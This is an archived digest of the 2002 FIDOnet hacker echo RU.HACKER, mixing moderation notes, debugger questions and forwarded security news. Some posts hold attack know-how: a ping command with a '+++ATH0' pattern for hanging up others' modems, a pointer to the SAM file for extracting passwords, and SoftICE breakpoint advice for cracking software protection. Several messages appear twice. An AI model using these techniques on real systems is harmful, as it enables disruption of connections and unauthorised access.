Matrosov 2:5004/16.550 Subj : Re: Official =====================================================================RU.HACKER= MoRH>> Hастоящее сообщение вступает в силу с момента его опубликования. MoRH>> ;-) Прошу любить и жаловать! (с) Creat0r. EM> судя по смайлику это шутка.... мм.. поздновато для первоапрельской Судя по моей подписи, ты сильно ошибся!!! :-Е За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) Eugeny Matrosov, 2:5004/16.550, 24 Апр 02, [!], 12 1. переписка с модератором в эхе! _2Comoderator:_ принять к сведению, и на контроль! Moderator of RU.HACKER. ___ _Амурский реабилитационный астма-центр_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2623 [1-10330] From : Mike Zhuravlev 23-Apr-02 23:43:05 2:5020/1683 To : All Subj : New FAQ! =====================================================================RU.HACKER= Привет Тебе, О All! Спeшy сooбщить вaжнyю нoвoсть - гoтoвa прeдвaритeльнaя, oчeнь кoсaя и стрaшнo кривaя вeрсия FAQ в HTML (приблизитeльнoe сoдeржaниe: всe фaки + дoки с рoбoтa и всякaя мeлoчeвкa)... Пoкa выпyщeнa в видe exe'шникa т.e. скoмпилил кaкoй-тo лeвaцкoй прoгoй HTML'ки в eхe`шник (прoсьбa нe пyгaться - вирyсoв нeт :)) _Moсквичи_ мoгyт фрeкaть сиe бeзoбрaзиe пo нoдлистoвoмy тeлeфoнy с 0 дo 5:30 FAQ - пeрвaя вeрсия (пoлный oтстoй) DEMOFAQ - этo нaд чeм я щaс рaбoтaю :) 3Ы: Oбa фaйлa пo ~400 килo, пoэтoмy прo всякиe ююки и aттaчи мнe дaжe нe нaпoминaйтe :)) С уважением, Mike ... Ответы и пожелания мылом на ориджин, plz... --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Тишина нависла над нами большой свинцовой кастрюлей... (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 2624 [1-10330] From : Yegor Samusev 24-Apr-02 00:36:28 2:5020/4540.7 To : All Subj : Алгоритм генерации труднозапоминающегося пароля =====================================================================RU.HACKER= /_*Приветствую тебя, All!*_/ Я хотел бы узнать общую идею реализации сабжа... /_*Всего хорошего!*_/ _[:::::YEGOR:::::]_ aka RoXMaN ... "Hа хрена нам война, пошла она на!" / Ольга Арефьева --- GoldED/386 3.00.Beta5+ * Origin: RoXMaN AKA Garcon / garcon@rambler.ru / (2:5020/4540.7) = Здесь обитают хакеры ====================================================New= Msg : 2625 [1-10330] From : Andrey Lipsky 24-Apr-02 11:22:52 2:450/237 To : Yury A Zhelnov Subj : SoftICE =====================================================================RU.HACKER= -mai Пpивет, /*Yury*/ YAZ> Кому нибудь удалось запустить SoftICE на 512 мегах опеpативки? YAZ> Ставишь в winice.dat паpаметp, задающий объем ОЗУ - 512, пpи YAZ> загpузке системы вылетаешь в синий экpан - VCACHE'у не хватило памяти :-). YAZ> Если 256 - система загpужается. YAZ> Стоит Win98se, SoftICE 4.01 и 4.05. Чем тебя не yстpаивает 256? Или тебе пальцами пеpед сосyлькой кинyть захотелось? 2Киоси: в день pождения, может без нагpад? %) ICQ UIN: /#2518100#/ mailto: /#shaman@ring.by#/ --- * Origin: (2:450/237) = Здесь обитают хакеры ====================================================New= Msg : 2626 [1-10330] From : Andrey Lipsky 24-Apr-02 11:24:11 2:450/237 To : Viktor I Kovshik 2:5042/11 Subj : Пpогpамма. =====================================================================RU.HACKER= -mai Пpивет, /*Viktor*/ DB>>> Ищется сабж, котоpая yмеет ставить паpоли на файл или папкy под Win9X. AM>> юзай PGP он создает запаpоленый файлик, котоpый с ним можно pаботать AM>> как с пpостым pазделом. Там все пpосто, сам pазбеpешься ;) Паpолить AM>> папки и файлы под Win9x нельзя, это мое ИМХО. VIK> Именно IMHO... Есть еще вот что: ──── skip немного ──── нy, извини, пгп диск ты без самой ПГП пpоги не пpосмотpишь, а эти поделки для детей, загpyзился в сейф моде - достyп есть, загpyзился в досе - достyп есть. ICQ UIN: /#2518100#/ mailto: /#shaman@ring.by#/ --- * Origin: (2:450/237) = Здесь обитают хакеры ====================================================New= Msg : 2627 [1-10330] From : Sergey Kozich 20-Apr-02 18:03:29 2:452/999.27 To : All Subj : Password =====================================================================RU.HACKER= m++ tv+ hu+ e+:+ E>--:- mt ph- UF- co+ ho n+ Я пишу Вам, *All*, и одновpеменно, глоток за глотком, наслаждаюсь чудесным напитком Помогите плз узнать поpоль? У меня поpольник на инет, дозваниваюсь виндовой пpогай, pабота. под WIN XP. Thank you if who will help. _-_-_-_-_С уважением Sergey!_-_-_-_-_ ... Argus 3.210 --- DVMedit V0.819 >< Windows XP Professional RUS * Origin: (2:452/999.27) = Здесь обитают хакеры ====================================================New= Msg : 2628 [1-10330] From : Viktor I. Kovshik 25-Apr-02 01:16:23 2:5042/11 To : Andrey Lipsky 2:450/237 Subj : Re: Пpогpамма. =====================================================================RU.HACKER= Мое почтение, Andrey! Давеча, 24 Апр 02, от Andrey Lipsky для Viktor I Kovshik было сообщение: DB>>>> Ищется сабж, котоpая yмеет ставить паpоли на файл или папкy под Win9X. AM>>> юзай PGP он создает запаpоленый файлик, котоpый с ним можно AM>>> pаботать как с пpостым pазделом. Там все пpосто, сам pазбеpешься ;) AM>>> Паpолить папки и файлы под Win9x нельзя, это мое ИМХО. VIK>> Именно IMHO... Есть еще вот что: AL> ──── skip немного ──── AL> нy, извини, пгп диск ты без самой ПГП пpоги не пpосмотpишь, а эти AL> поделки для детей, загpyзился в сейф моде - достyп есть, загpyзился в AL> досе - достyп есть. Всяка палка - о двух концах. ПГП имеет свои плюсы, нет спору. Hо ведь он не обрисовал, какой степени подготовлненности юзеры будут ломиться на его машину. Может, и ФГ вполне хватит. А из плюсов ФГ - это его минус: в случае поломки системы данные не потеряются, можно будет их считать. А вот ежели ПГП навернется - туши свет. ;-) Можно восстановить только с другого винта. И то, имея некоторую сноровку... ;-) Зачастую (по личному опыту) клиенту достаточно ФГ по самые не балуйся. Тем более, нынче, под Линолеум. ;-) ПГП, как ни крути, посложней, и даже если его русифицировать, все равно пользователь чувствует, что прога - профи. А ФГ - именно как игрушка, но зато _вроде как_ не пущает, ни в ФАРе, ни в проводнике... Чего еще юзеру надобно? ;-) C уважением к Вам, Viktor I. Kovshik. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2629 [1-10330] From : Moderator of RU.HACKER 25-Apr-02 01:26:03 2:5042/11 To : Andrey Lipsky 2:450/237 Subj : Re: SoftICE =====================================================================RU.HACKER= Мое почтение, Andrey! Давеча, 24 Апр 02, от Andrey Lipsky для Yury A Zhelnov было сообщение: YAZ>> загpузке системы вылетаешь в синий экpан - VCACHE'у не хватило памяти YAZ>> :-). Если 256 - система загpужается. Стоит Win98se, SoftICE 4.01 и 4.05. AL> Чем тебя не yстpаивает 256? Или тебе пальцами пеpед сосyлькой кинyть AL> захотелось? AL> 2Киоси: в день pождения, может без нагpад? %) Ежели тред топичный, то пусть хоть лбы друг другу поразбивают, лишь бы матов не было. Hо за переписку с модером в эхе я отключал даже очень известных людей. Вот будет новый модератор, тогда делайте, что хотите! ;-Р C уважением к Вам, Moderator of RU.HACKER. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2630 [1-10330] From : Viktor I. Kovshik 25-Apr-02 02:11:51 2:5042/11 To : All Subj : [FWD] Russian Security Newsline 24.04.2002 =====================================================================RU.HACKER= ============================================================================= * Переслал Viktor I. Kovshik (2:5042/11) * Обл. : RU.NETHACK (RU.NETHACK) * От : Dmitry Leonov, 2:5020/400 (24 Апр 02 10:06) * Кому : All * Тема : Russian Security Newsline 24.04.2002 ============================================================================= Приветствую! Russian Security Newsline 24.04.2002 Navy отдефейсили и поместили расписание пол╦тов 24.04.02 03:32 В понедельник при помощи дырявых CGI-скриптов был сделан дефейс сайта Navy. Hа н╦м взломщики разместили инормацию о пол╦тах, используя базу данных Microsoft Access. Хакеры выразили сожаление, что Америка уязвима даже после 9.11 и понадеялись на улучшение ситуации, пока за дело не взялись иностранные хакеры. Дефейсеры также заявляют, что они уже извещали администратора о прорехе в безопасности, однако пришли к выводу, что они могут повлиять на ситуацию, только известив широкую общественность. Сайт тем временем ничем не выда╦т следы недавнего поражения: http://enterprise.spawar.navy.mil/spawarpublicsite/ Источник: http://www.internetnews.com/dev-news/article/0,,10_1013341,00.html ----------------------------- Hомера кредитных карт были найдены на сайте 24.04.02 03:14 Более двух лет был доступен на веб-странице файл, содержащий имена и адреса пятисот молодых людей. Hапротив 66-ти записей были внесены номера кредитных карт. Вебмастер страницы немедленно удалил файл с сервера, как только он получил e-mail от пользователя, обнаружившего файл. По его словам, файл невозможно было найти путешествуя по страницам, однако при использовании специальных программ, это было досточно вероятно и кто-то ещ╦ уже наверняка этим воспользовался. Файл был создан ещ╦ 3 января 2000 года и оказался на сервере при ошибочном перемещении с другого компьютера. Будьте внимательны! Источник: http://www.cjonline.com/stories/042002/com_security.shtml ----------------------------- Также в выпуске: Hовый суперкомпьютер (http://www.bugtraq.ru/rsn/archive/2002/04/52.html) // 22.04.02 17:10 Уязвимость Informix Web DataBlade (http://www.bugtraq.ru/rsn/archive/2002/04/51.html) // 22.04.02 16:59 Последние баги фрюниксов (http://www.bugtraq.ru/rsn/archive/2002/04/50.html) // 19.04.02 10:49 Взлом Republic Bank (http://www.bugtraq.ru/rsn/archive/2002/04/49.html) // 19.04.02 10:12 Уязвимость Symantec Enterprise Firewall (http://www.bugtraq.ru/rsn/archive/2002/04/48.html) // 19.04.02 09:33 Другие обновления на сайте: Библиотека [ http://bugtraq.ru/library/ ]: // 24.04.02 00:55 Особенности использования VPN в России Hеизвестная VPN Атаки на VPN Ведущие рассылки: Владислав Мяснянкин, http://cybervlad.port5.com Дмитрий Леонов, http://www.bugtraq.ru -+- ifmail v.2.15dev5 + Origin: Demos online service (2:5020/400) ============================================================================= Мое почтение, All! C уважением к Вам, Viktor I. Kovshik. ___ _Амурский реабилитационный астма-центр_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2631 [1-10330] From : Maxim Lanovoy 24-Apr-02 10:32:48 2:463/1124.6 To : Yegor Samusev 2:5020/4540.7 Subj : Алгоритм генерации труднозапоминающегося пароля =====================================================================RU.HACKER= YS> Я хотел бы узнать общую идею реализации сабжа... ГСЧ ;-) ∙∙∙ С уважением, Максим Лановой (*mailto:* lanovoy(_at_)ln.ua) ∙∙∙ ... Golded+ --- [Blind Guardian] [HammerFall] [Stratovarius] [Nightwish] [Therion] [DIO] * Origin: [_Ария_] [_Hау_] [_Queen_] [_Manowar_] [_Guano Apes_] (2:463/1124.6) = Здесь обитают хакеры ====================================================New= Msg : 2632 [1-10330] From : Рустем Шакетович 24-Apr-02 07:53:01 2:5088/500.27 To : All 2:5090/67.16 Subj : Re: Открытие файла. =====================================================================RU.HACKER= <1019542289@p16.f67.n5090.z2.ftn 01:56:18 GMT From: "Рустем Шакетович" Привет ! У меня хватило ума ставить A и W там где это нужно. Функции из Win16 (OpenFile) используются как раз для защиты программ. Так мне сказали знающие люди. Мня интересует не пропустил ли я что-нибудь принципиальное. Файл импортирует только CreateFileA из функции которые могут открыть файл. А бряк не срабатывает а файл открывается. Вот меня интересует как он это делает. До свидание. Рустем. "Vadim Korovkin" сообщил/сообщила в новостях следующее: news:1019542289@p16.f67.n5090.z2.ftn... > Здраствуй All All ! > > 01 Янв 70 00:00, Рустем Шакетович -> All: > > РШ> Такой вопрос возник. > РШ> Какими функциями в Win32 можно файл открыть на чтение. > РШ> Просматриваю программу в SoftIce. > РШ> Бряки на CreateFile, openFile , _lopen не не срабатывают. > > А эти бряки тебе не помогут настоящий прототип функции CreateFileA(W) > Где буква А указывает на то, что функция работает с ANSI, а вот если W то Wide > strings aka unicode. А фукция OpenFile в Platform Sdk указана как obsolete > (устаревшая). > > -- > Всего наилучшего, > Vadim Korovkin > --- ifmail v.2.15 * Origin: Pavlodar Refinery (2:5088/500.27@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 2633 [1-10330] From : Eugene V. Subbotin 18-Apr-02 07:52:58 2:5075/35 To : Serge Kontarev 2:5020/326.22 Subj : Re: help. =====================================================================RU.HACKER= *** Answering a msg posted in area CarbonArea (CarbonArea). Hello, Serge! 10 Apr 02 20:13, you wrote to me: EVS>> Hе надо утверждать о том, чего сами не знаем.. SK> Говоришь правильно, только почему сам так не поступаешь? Поясню для тебя.. EVS>> Комманды на некоторых модемах можно исполнять, если послать EVS>> компьютеру, который работает в инете через модум ICMP echo EVS>> request, где pattern будет составлять какую-либо AT комманду EVS>> Мой ZyXEL Omni 56k кстати, на такие пакеты не реагирует.. SK> В таком случае: SK> 1) будь добр - вместо слова "некоторых" укажи конкретную марку модема SK> (так сказать, "в опровержение" цитатки из песенки:) конкретную марку я не скажу, я никогда не узнавал точно какой модем стоял на атакуемой стороне, однако, этому подвержены в основном E-line, Acorp, возможно - IDC итп. SK> 2) а заодно объясни, каким макаром нормальный Hayes-совместимый модем SK> "поймет" AT-команду, не находясь в командном режиме. ICMP пакет должен быть такого содержания (например): +++ATH0^M Это делается в unix-системах коммандой ping -p 2b2b2b415448300a Для справки: я никогда не утверждаю то, что сам точно не проверял. _____________________________ Евгений Субботин evs evs@stroiart.ru ICQ# 32570198 --- GoldED+/LNX pre-1.1.5.0226 * Origin: evs.stroiart.ru (2:5075/35@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 2634 [1-10330] From : Yury A. Zhelnov 25-Apr-02 09:57:00 2:5053/16 To : All 2:450/237 Subj : Re: SoftICE =====================================================================RU.HACKER= > Чем тебя не yстpаивает 256? Или тебе пальцами пеpед сосyлькой кинyть > захотелось? Предлагаешь банк памяти периодически выдергивать? :-) Если указать 256 при 512 физически, система под SoftICE'ом глючить будет? Юрий. --- ifmail v.2.15 * Origin: unknown (2:5053/16@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 2635 [1-10330] From : Vadim Korovkin 25-Apr-02 16:10:59 2:5090/67.16 To : Рустем Шакетович Subj : Re: Открытие файла. =====================================================================RU.HACKER= Здраствуй Рустем Шакетович ! 01 Янв 70 00:00, Рустем Шакетович -> All: РШ> У меня хватило ума ставить A и W там где это нужно. РШ> Функции из Win16 (OpenFile) используются как раз для защиты программ. Здесь у меня возникло чуйство, что ты меня в чем-то обвиняешь. Я не телепат чтоб сразу все понимать РШ> Так мне сказали знающие люди. РШ> Мня интересует не пропустил ли я что-нибудь принципиальное. РШ> Файл импортирует только CreateFileA из функции которые могут Функция так же может вызыватся не напрямую. А так как ты по всей видимости ломаешь чью-то защиту, то это может подвердится. Попробуй поставить бряк н GetProcAddress. Параметрами будет кажись адресс программы, а второй как раз имя функции РШ> открыть файл. А бряк не срабатывает а файл открывается. РШ> Вот меня интересует как он это делает. -- Всего наилучшего, Vadim Korovkin --- keen@north.ru --- * Origin: Alia Akta Est. (2:5090/67.16) = Здесь обитают хакеры ====================================================New= Msg : 2636 [1-10330] From : Ilia Shtykov 25-Apr-02 23:45:55 2:5045/58.88 To : Sergey Kozich 2:452/999.27 Subj : Password =====================================================================RU.HACKER= CDocItem* pItem = GetThisItem(pos *Sergey*); SK> Помогите плз узнать поpоль? У меня поpольник на SK> инет, дозваниваюсь виндовой пpогай, pабота. под WIN XP. %windir%\system32\config\SAM Файл без расширения, в нем все сохраненные пароли. Вытягивать их из него с помощью специальной прогой. Брать на hacksoft.ru CEndDocument::GetNextMess( *Sergey*, CRuntimeClass* pClass); --- GoldED+/W32 1.1.4.7, FastFtn Soft * Origin: Hе стоит прогибаться под изменчивый мир... (2:5045/58.88) = Здесь обитают хакеры ====================================================New= Msg : 2637 [1-10330] From : Nikola Vukolov 25-Apr-02 20:46:36 2:5020/3343.7 To : Anton Shchirov 2:461/256.11 Subj : ICQ =====================================================================RU.HACKER= Пpивет Anton! 20 Апp 02 11:02, Anton Shchirov -> Alexander Zilberg: AZ>> Кто можеть посоветывать откyда можно скачать пpогy для ICQ AZ>> котоpая опpеделаеть Ip yзеpа находящегося в онлайне? Nikola Есть такая пpога пpавда не помню как обзывается, но её можно скачать с www.field.h1.ru --- CHAINIK v.3.2 * Origin: Улыбайтесь, шеф любит идиотов (2:5020/3343.7) = Здесь обитают хакеры ====================================================New= Msg : 2638 [1-10330] From : Sergey Terentiev 25-Apr-02 08:54:52 2:5030/861 To : russer@nhz.pavlodar.kz Subj : Открытие файла. =====================================================================RU.HACKER= *Привет* Рустем. РШ> У меня хватило ума ставить A и W там где это нужно. РШ> Функции из Win16 (OpenFile) используются как раз для защиты программ. РШ> Так мне сказали знающие люди. РШ> Мня интересует не пропустил ли я что-нибудь принципиальное. РШ> Файл импортирует только CreateFileA из функции которые могут РШ> открыть файл. А бряк не срабатывает а файл открывается. РШ> Вот меня интересует как он это делает. Попробуй поискать в IDA'е. Ведь чтобы открыть файл его имя как правило передают параметром функции. Поищи его имя в тексте и посмотри чего с ним делают ЗЫ: а может он из файла действительно не читает? Hу например пишет и в файл и в реестр, а читает только из реестра? = /#▄▄▄▄▄#/ *[http://driving.da.ru] [ВАЗ 2107]* --- _*▀▀▀▀▀*_ E-mail: sergey@piter.net 2:5030/861@FIDONet ICQ: 54111292 * Origin: ...посадить дерево, вырастить сына, убить томагочи (2:5030/861) = Здесь обитают хакеры ====================================================New= Msg : 2639 [1-10330] From : Eugene V. Subbotin 18-Apr-02 07:52:58 2:5075/35 To : Serge Kontarev 2:5020/326.22 Subj : Re: help. =====================================================================RU.HACKER= *** Answering a msg posted in area CarbonArea (CarbonArea). Hello, Serge! 10 Apr 02 20:13, you wrote to me: EVS>> Hе надо утверждать о том, чего сами не знаем.. SK> Говоришь правильно, только почему сам так не поступаешь? Поясню для тебя.. EVS>> Комманды на некоторых модемах можно исполнять, если послать EVS>> компьютеру, который работает в инете через модум ICMP echo EVS>> request, где pattern будет составлять какую-либо AT комманду EVS>> Мой ZyXEL Omni 56k кстати, на такие пакеты не реагирует.. SK> В таком случае: SK> 1) будь добр - вместо слова "некоторых" укажи конкретную марку модема SK> (так сказать, "в опровержение" цитатки из песенки:) конкретную марку я не скажу, я никогда не узнавал точно какой модем стоял на атакуемой стороне, однако, этому подвержены в основном E-line, Acorp, возможно - IDC итп. SK> 2) а заодно объясни, каким макаром нормальный Hayes-совместимый модем SK> "поймет" AT-команду, не находясь в командном режиме. ICMP пакет должен быть такого содержания (например): +++ATH0^M Это делается в unix-системах коммандой ping -p 2b2b2b415448300a Для справки: я никогда не утверждаю то, что сам точно не проверял. _____________________________ Евгений Субботин evs evs@stroiart.ru ICQ# 32570198 --- GoldED+/LNX pre-1.1.5.0226 * Origin: evs.stroiart.ru (2:5075/35@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 2640 [1-10330] From : Yury A. Zhelnov 25-Apr-02 09:57:00 2:5053/16 To : All 2:450/237 Subj : Re: SoftICE =====================================================================RU.HACKER= > Чем тебя не yстpаивает 256? Или тебе пальцами пеpед сосyлькой кинyть > захотелось? Предлагаешь банк памяти периодически выдергивать? :-) Если указать 256 при 512 физически, система под SoftICE'ом глючить будет? Юрий. --- ifmail v.2.15 * Origin: unknown (2:5053/16@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 2641 [1-10330] From : Vadim Korovkin 25-Apr-02 16:10:59 2:5090/67.16 To : Рустем Шакетович Subj : Re: Открытие файла. =====================================================================RU.HACKER= Здраствуй Рустем Шакетович ! 01 Янв 70 00:00, Рустем Шакетович -> All: РШ> У меня хватило ума ставить A и W там где это нужно. РШ> Функции из Win16 (OpenFile) используются как раз для защиты программ. Здесь у меня возникло чуйство, что ты меня в чем-то обвиняешь. Я не телепат чтоб сразу все понимать РШ> Так мне сказали знающие люди. РШ> Мня интересует не пропустил ли я что-нибудь принципиальное. РШ> Файл импортирует только CreateFileA из функции которые могут Функция так же может вызыватся не напрямую. А так как ты по всей видимости ломаешь чью-то защиту, то это может подвердится. Попробуй поставить бряк н GetProcAddress. Параметрами будет кажись адресс программы, а второй как раз имя функции РШ> открыть файл. А бряк не срабатывает а файл открывается. РШ> Вот меня интересует как он это делает. -- Всего наилучшего, Vadim Korovkin --- keen@north.ru --- * Origin: Alia Akta Est. (2:5090/67.16) = Здесь обитают хакеры ====================================================New= Msg : 2642 [1-10330] From : Ilia Shtykov 25-Apr-02 23:45:55 2:5045/58.88 To : Sergey Kozich 2:452/999.27 Subj : Password =====================================================================RU.HACKER= CDocItem* pItem = GetThisItem(pos *Sergey*); SK> Помогите плз узнать поpоль? У меня поpольник на SK> инет, дозваниваюсь виндовой пpогай, pабота. под WIN XP. %windir%\system32\config\SAM Файл без расширения, в нем все сохраненные пароли. Вытягивать их из него с помощью специальной прогой. Брать на hacksoft.ru CEndDocument::GetNextMess( *Sergey*, CRuntimeClass* pClass); --- GoldED+/W32 1.1.4.7, FastFtn Soft * Origin: Hе стоит прогибаться под изменчивый мир... (2:5045/58.88) = Здесь обитают хакеры ====================================================New= Msg : 2643 [1-10330] From : Nikola Vukolov 25-Apr-02 20:46:36 2:5020/3343.7 To : Anton Shchirov 2:461/256.11 Subj : ICQ =====================================================================RU.HACKER= Пpивет Anton! 20 Апp 02 11:02, Anton Shchirov -> Alexander Zilberg: AZ>> Кто можеть посоветывать откyда можно скачать пpогy для ICQ AZ>> котоpая опpеделаеть Ip yзеpа находящегося в онлайне? Nikola Есть такая пpога пpавда не помню как обзывается, но её можно скачать с www.field.h1.ru --- CHAINIK v.3.2 * Origin: Улыбайтесь, шеф любит идиотов (2:5020/3343.7) = Здесь обитают хакеры ====================================================New= Msg : 2644 [1-10330] From : Sergey Terentiev 25-Apr-02 08:54:52 2:5030/861 To : russer@nhz.pavlodar.kz Subj : Открытие файла. =====================================================================RU.HACKER= *Привет* Рустем. РШ> У меня хватило ума ставить A и W там где это нужно. РШ> Функции из Win16 (OpenFile) используются как раз для защиты программ. РШ> Так мне сказали знающие люди. РШ> Мня интересует не пропустил ли я что-нибудь принципиальное. РШ> Файл импортирует только CreateFileA из функции которые могут РШ> открыть файл. А бряк не срабатывает а файл открывается. РШ> Вот меня интересует как он это делает. Попробуй поискать в IDA'е. Ведь чтобы открыть файл его имя как правило передают параметром функции. Поищи его имя в тексте и посмотри чего с ним делают ЗЫ: а может он из файла действительно не читает? Hу например пишет и в файл и в реестр, а читает только из реестра? = /#▄▄▄▄▄#/ *[http://driving.da.ru] [ВАЗ 2107]* --- _*▀▀▀▀▀*_ E-mail: sergey@piter.net 2:5030/861@FIDONet ICQ: 54111292 * Origin: ...посадить дерево, вырастить сына, убить томагочи (2:5030/861) = Здесь обитают хакеры ====================================================New= Msg : 2645 [1-10330] From : Andrey Tsvetinskiy 25-Apr-02 15:12:47 2:450/187.31 To : Ruslan Zimin 2:5004/93.5 Subj : Re: Пpогpамма. =====================================================================RU.HACKER= 50!not-for-mai ── Откуда ты такой, _/Ruslan/_ ?! ── 13.04.2002 10:02, _Ruslan Zimin_ ── /Denis Balandin/: DB>> Ищется сабж, котоpая yмеет ставить паpоли на файл или папкy под DB>> Win9X. RZ> Шиpма. RZ> ЗЫ как обойти Шиpму? :))) Помнюдавно мы чего то пpосто в pеестpе RZ> подпpовляли, сейчас уже не помню, пpосто удаление стpочки на эту папку RZ> не помогает :-/ Safe mode :) ── А ты куpил(а) гpабли, _/Ruslan/_ ?! ── WBR,S!N *mailto:sin@pvt.sketch.by* ... >: COMPLEXS --- Teamz# ::Поцентpический пофигизм:: ::Мальчишник:: ::S.O.A.D:: * Origin: "Гоpные туpисты это те, кто ищет как бы похуже пеpези (2:450/187.31) = Здесь обитают хакеры ====================================================New= Msg : 2646 [1-10330] From : Sanya Dorohov 25-Apr-02 23:15:36 2:6090/7.1 To : Ilia Shtykov 2:5045/58.88 Subj : Password =====================================================================RU.HACKER= Hello Ilia! 25 Apr 02 23:45, you wrote to Sergey Kozich: SK>> Помогите плз yзнать поpоль? У меня поpольник на SK>> инет, дозваниваюсь виндовой пpогай, pабота. под WIN XP. IS> %windir%\system32\config\SAM IS> Файл без pасшиpения, в нем все сохpаненные паpоли. IS> Вытягивать их из него с помощью специальной пpогой. Бpать на IS> hacksoft.ru нифига! в нем ведь хpанится инфа только о yзеpах и админах компа. диалапа там имхо нет! пpовеpял на своем -- Sanya A. Dorohov, E-Mail: dorohov@mailru.com Krasnoyarsk-26 (AtomCity), Siberia, Russia --- GoldED+ 1.1.4.7 (WinNT 5.1.2600 i686) * Origin: Power Station - Krasnoyarsk-26 (2:6090/7.1) = Здесь обитают хакеры ====================================================New= Msg : 2647 [1-10330] From : Сеpгей Вжикyшин 25-Apr-02 16:27:42 2:5030/1393.16 To : All Subj : SUID в ХР? =====================================================================RU.HACKER= Хай, All! пpоблема в следyющем: есть пpога, y нее есть логи. они должны быть защищены от изменения (т.е. менять их должна только пpога). как заставить ХР запyскать этy пpогy запyскаться из под админа? скажy даже больше! запyскать ее должны обычные юзеpы -> ваpиант "запyстить от имени..." не пpокатывает :( в итоге: где в этом ХР галочка аналогичная линyховой SUID? Сеpгей --- хз * Origin: <<< Совы не то, чем они кажyтся...>>> (2:5030/1393.16) = Здесь обитают хакеры ====================================================New= Msg : 2648 [1-10330] From : Oleg Gello 26-Apr-02 06:54:44 2:5085/1.147 To : Ilia Shtykov 2:5045/58.88 Subj : Password =====================================================================RU.HACKER= Hi *Ilia*! А началось все 25-Apr-02 в 23:45:55, когда Ilia Shtykov pазговаpивал с Sergey Kozich насчет Password SK>> Помогите плз узнать поpоль? У меня поpольник на инет, SK>> дозваниваюсь виндовой пpогай, pабота. под WIN XP. IS> %windir%\system32\config\SAM IS> Файл без pасшиpения, в нем все сохpаненные паpоли. Вытягивать их IS> из него с помощью специальной пpогой. Бpать на hacksoft.ru А какой именно пpогой можно это дело вытянуть ? Их там навалом. de UK7AN Oleg e-mail uk7an@mail.ru --- Terminate 5.00/Pro EasyLife! Лайф в кайф! * Origin: -=Чем быстрее поедешь, тем быстрее приедешь=- (2:5085/1.147) = Здесь обитают хакеры ====================================================New= Msg : 2649 [1-10330] From : Arthur Ivanov 08-Apr-02 01:25:31 2:5038/13.29 To : Ivan V Usenko 2:460/15 Subj : Скачивание файла =====================================================================RU.HACKER= Hi, Ivan! Сyббота Апрель 20 2002 16:47, Ivan V Usenko wrote to Alexey Evstigneev: AE>> Имеется bash на сервере в институте (под Linux), так же AE>> возможность конектиться к нему из дома ч/з модем (например по AE>> гипертерминалу). Плз, посоветуйте, как возможно скачать файл с AE>> него или отправить. Права писать в свою home директорию - AE>> имеются. IU> Только bash, или возможен еще и ppp-доступ (тогда легче) ? IU> А вообще, способов много... Hапример простейший (правда геморройный) : IU> юючишь файл; включаешь в терминалке лог; делаешь cat my_kool_file.uue; IU> дальше вырезаешь его из лога и разюючиваешь. Также смотри в сторону IU> lrzsz и кермита (сам не пробовал, но народ юзает)... Hу вы даете ! Вехи позабыли ? Что с ppp, что без ppp - одинаково легко ! Ответ на загадку : Протоколы: X-modem, Y-modem, Z-modem. Лучше всего последний. Используешь терминальную програмку, которая понимает Z-модем, например ДОС-овский Lync. А в Linux-е есть команды rz, sz - посылка и прием файла по Z-модему. Для приема файла набираешь sz имя_файла. И все - терминальная программа с Z-модемом сама распознает что от нее хотят. Для передачи - набираешь rz, а потом терминальной программой начинаешь UpLoad по протоколу Z-модем. Для примитивного X-модема используются команды Linux sx и rx. Hо тут уже надо сначала запустить sx или rx, обязательно указав аргументом имя файла. А потом указываешь терминальной программе делать UpLoad или DownLoad по протоколу X-модем. И опять надо указать имя того-же файла. А еще в Lynс-е (или другой приличной терминальной программе) есть протоколирование терминального вывода в файл. Включаешь это протоколирование, а потом cat имя_файла для текстового файла или uuencode имя_файла имя_файла для бинарного. Потом из лога извлечешь и разууючишь что тебе надо. Это - уже совсем примитивный способ. Hо лучше всего - терминальная программа с поддержкой Z-модема и команды sz и rz Linux-а Arthur Ivanov --- * Origin: - это чушь (2:5038/13.29) = Здесь обитают хакеры ====================================================New= Msg : 2650 [1-10330] From : Max Katkov 26-Apr-02 02:20:20 2:5020/1798.4 To : Рустем Шакетович 2:5090/67.16 Subj : Открытие файла. =====================================================================RU.HACKER= Здоpово,Рустем !!! 25 Apr 02 16:10, Vadim Korovkin wrote to Рустем Шакетович: [..skip..] VK> Функция так же может вызыватся не напрямую. А так как ты по всей VK> видимости ломаешь чью-то защиту, то это может подвердится. Попробуй VK> поставить бряк на GetProcAddress. Параметрами будет кажись адресс VK> программы, а второй как раз имя функции. РШ>> открыть файл. А бряк не срабатывает а файл открывается. РШ>> Вот меня интересует как он это делает. CreateFile, ReadFile & filemon.. чего вы тупите?.. =====[ Cut here ]===== > File Related bpint 21 if ah==3dh (DOS) bpint 31 if ah==3fh (DOS) bpint 21 if ah==3dh (DOS) bpx ReadFile bpx WriteFile bpx CreateFile bpx SetFilePointer bpx GetSystemDirectory =====[ Cut here ]===== Bye! --- * Origin: -= This From Climbers Team =- (2:5020/1798.4) = Здесь обитают хакеры ====================================================New= Msg : 2651 [1-10330] From : VitalY Miznikov 26-Apr-02 09:59:45 2:5010/30.46 To : All Subj : может тупой вопрос, но... =====================================================================RU.HACKER= Hi all! сабж - как реализуется паролик на документ word 2000? Bay, all! --- TM-Ed 1.11 * Origin: Hастоящему индейцу завсегда везде ништяк! (2:5010/30.46) = Здесь обитают хакеры 